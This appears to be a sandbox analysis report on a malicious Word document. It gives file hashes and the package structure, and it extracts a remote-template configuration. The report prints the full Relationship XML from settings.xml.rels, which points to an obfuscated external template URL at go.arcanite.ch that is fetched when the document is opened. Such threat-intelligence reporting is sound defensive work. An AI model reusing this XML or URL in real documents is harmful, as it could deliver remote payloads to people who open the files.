Malicious
Malicious

c704bfd94d7592e467a84b40bb64fc40

MS Word Document
|
MD5: c704bfd94d7592e467a84b40bb64fc40
|
Size: 67.69 KB
|
application/msword


Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
c704bfd94d7592e467a84b40bb64fc40
Sha1
7bc8b8cce5613292a147da481f93cbacfd9f490b
Sha256
76cae04f9b3c1fe16f10b2740ff23a067258babf7f520c81a6fb16687f425d19
Sha384
28a7611ea91dd9a03630b0e2c6bfc5b52a85685d3358a86b2f8ec1a6479188ca9cb69258944438eb6841b5fe6094f3c7
Sha512
d677c1fd16630e2554dab43867d3fbeb264b325def9295cebc99aa20be358d32a8664dae350341388d64cb94721cfe68858ec32f1588ade70b61888409ad4691
SSDeep
1536:3The4vVywksJe7Qdozhqz4J/VRkGR/gFaKf:Dhe4dy6oQkdRkO/gFaKf
TLSH
E163F1F46725502FC2976D32C8A52E97CBFD6713C7A37A992C2487A618F63CF0550AC8
File Structure
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
footer2.xml.rels
document.xml
footnotes.xml
footer3.xml
footer2.xml
header3.xml
endnotes.xml
media
image2.jpeg
image2.jpeg-preview.png
theme
theme1.xml
settings.xml
styles.xml
fontTable.xml
webSettings.xml
docProps
core.xml
app.xml
Malware Configuration - Remote Template
Config. Field
Value
Target

https://--------------------------------9238499328998429404023049004539405093@go.arcanite.ch/994FVU?&------------------------------3299402340402930424029483249924929348

Path

settings.xml.rels

XPath

/Relationships/Relationship

Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://--------------------------------9238499328998429404023049004539405093@go.arcanite.ch/994FVU?&amp;------------------------------3299402340402930424029483249924929348" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />

Artefacts
Name
Value
Remote Template - Highly Suspicious

https://--------------------------------9238499328998429404023049004539405093@go.arcanite.ch/994FVU?&------------------------------3299402340402930424029483249924929348

c704bfd94d7592e467a84b40bb64fc40 (67.69 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙